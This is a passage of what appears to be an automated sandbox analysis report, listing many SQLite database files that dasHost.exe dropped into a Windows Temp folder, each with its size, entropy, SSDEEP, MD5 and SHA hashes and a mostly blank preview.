                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\K8405sSdiL

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\KJjYgU4gYK

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\LFlGO8ryoD

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\M5BJkUpthB

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\M8Z3yL4kLJ

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\MAO2kg5cMK

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\MDDX5vzUfR

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\MEN9iMUhSt

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Mv6TedJLRp

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\NmFn3jO0Ud

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\NtAEgVLl5E

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\OVXgbAnMQJ

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\OeQMqn09L0

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Oj26TlIvgh

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\OxmsZC0ol6

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\PRIxxBARjU

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Pp3LnlN9Dn

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Q3Uw979CA2

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\QIwxI1KwJR

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\QMjGPHoliw

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\QUClOqOgQW

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\QVXBnSKQUm

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\R6d8d7j4J7

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
